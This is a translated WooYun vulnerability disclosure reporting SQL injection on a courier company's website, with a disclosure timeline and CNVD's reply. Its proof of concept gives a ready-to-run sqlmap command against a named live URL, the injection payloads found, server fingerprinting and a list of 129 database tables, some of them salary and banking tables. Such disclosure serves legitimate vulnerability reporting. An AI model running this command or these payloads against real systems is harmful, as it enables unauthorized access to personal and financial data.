
Vulnerability summary

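Bug ID: wooyun-2014-085751

Title: SQL injection at a courier company leaks user information

Related vendor: cncert National Internet Emergency Center

Author: 路人甲

Submitted: 2014-12-04 11:17

Fixed: 2015-01-18 11:18

Published: 2015-01-18 11:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Vulnerability status: handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]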



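Vulnerability details

Disclosure status:

2014-12-04: Details reported to the vendor; awaiting vendor handling
2014-12-09: Vendor has confirmed; details disclosed to the vendor only
2014-12-19: Details disclosed to core white hats and experts in related fields
2014-12-29: Details disclosed to regular white hats
2015-01-08: Details disclosed to intern white hats
2015-01-18: Details disclosed to the public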

Brief description:

As the title says.

Detailed description:

Injection point: Sqlmap -u "http://lntjs.vicp.net/fgfw-detail.asp?NewsID=1" -D db_tjs --tables --thread 10


Proof of vulnerability:

[root@Hacker~]# Sqlmap  Sqlmap -u "http://lntjs.vicp.net/fgfw-detail.asp?NewsID=1" -D db_tjs --tables --thread 10
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey a
[*] starting at 17:28:48
[17:28:49] [INFO] resuming back-end DBMS 'microsoft sql server'
[17:28:49] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: NewsID
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: NewsID=1' UNION ALL SELECT CHAR(113)+CHAR(119)+CHAR(119)+CHAR(116)+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(73)+CHAR(83)+CHAR(107)+CHAR(102)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: NewsID=1'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: NewsID=1' WAITFOR DELAY '0:0:5'--
---
[17:28:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[17:28:49] [INFO] fetching tables for database: db_tjs
Database: db_tjs
[129 tables]
+----------------------------+
| ArriveCompanyDetailTable |
| ArriveCompanyMainTable |
| ArriveCompanyRecordTable |
| CityDetailTable |
| CityMainTable |
| ClientInfo |
| DETAIL |
| ErrCheckTable |
| MachinePerSonTable |
| ProductMapping |
| Products |
| QueryCarrierShipment |
| T1_gz_gzjs |
| T1_gz_sdsbz |
| T_Area |
| T_CLInfo |
| T_Department |
| T_Employee |
| T_FArea |
| T_IdName |
| T_Operator |
| T_Position |
| T_PrivilegeList |
| T_PrivilegeMapping |
| T_Role |
| T_RowCount |
| T_SalaryDetail |
| T_SalaryInfo |
| T_SalarySheet |
| T_cljcxx |
| T_cw_km_hz |
| T_cw_km_ye |
| T_cw_km_ye_mx |
| T_cw_km_ye_ny |
| T_cw_pz_hz |
| T_cw_pz_input |
| T_cw_pz_mx |
| T_cw_pzh |
| T_ddd |
| T_fct |
| T_fgfw |
| T_fgs |
| T_gz_bx |
| T_gz_mbyye |
| T_gz_mbyyefw |
| T_gz_sds |
| T_gz_ssxxcx |
| T_gz_tcblhbx |
| T_gz_twcyye |
| T_gz_wwcyyehgz |
| T_gz_yfhjhbxl |
| T_gz_yggzmx |
| T_gz_yggzmx1 |
| T_gz_yggzmx2 |
| T_gz_ygjbxx |
| T_gz_yjzycl |
| T_gzd_qdtmp |
| T_killinfo |
| T_logs |
| T_operators |
| T_rk_temp |
| T_rk_wld |
| T_rk_wld_hz |
| T_rk_wld_mxhz |
| T_rk_wld_mxhz1 |
| T_sz_dsfbz |
| T_sz_qtje |
| T_sz_rbhz |
| T_sz_yhk |
| T_sz_yhksrmx |
| T_tax |
| T_test |
| T_tz |
| T_version |
| T_wtr |
| T_wts |
| T_yfjs_bz |
| T_ygxx |
| T_yh_cjc |
| T_yh_jyls |
| T_yh_kcz |
| T_yh_kjc |
| T_yh_yc |
| Table_czy |
| Table_fgsjl |
| Table_fxj |
| Table_jbsj |
| Table_jxgz |
| Table_mbyye |
| Table_sl |
| Table_tcbz |
| Table_tf |
| Table_yggzb |
| Table_yhje |
| Table_yysj |
| UploadRoute |
| UploadTransportInformation |
| V_OP |
[17:28:50] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled
| ?? |
| dealer |
| dtproperties |
| fhfs |
| info_op |
| op_history |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| rktemp |
| sysconstraints |
| syssegments |
| t2 |
| t_cn_bj |
| t_cn_ds |
| t_cn_fp |
| t_cn_hz |
| t_cn_rb |
| t_cn_sz |
| t_cn_xh |
| t_cn_yh |
| t_cn_yhrb |
| t_cn_yj |
| t_cn_yyt |
| t_yhhzb |
| t_yhlsz |
| t_yyhb |
| tb_print |
| worksheet |
+----------------------------+

Remediation:

null

Copyright notice: when reposting, please credit the source 路人甲@乌云


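Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-12-09 09:00

Vendor reply:

CNVD has confirmed and reproduced the situation described. No direct handling channel with the organization that manages the website has been established yet; awaiting claim.

Latest status:

None yet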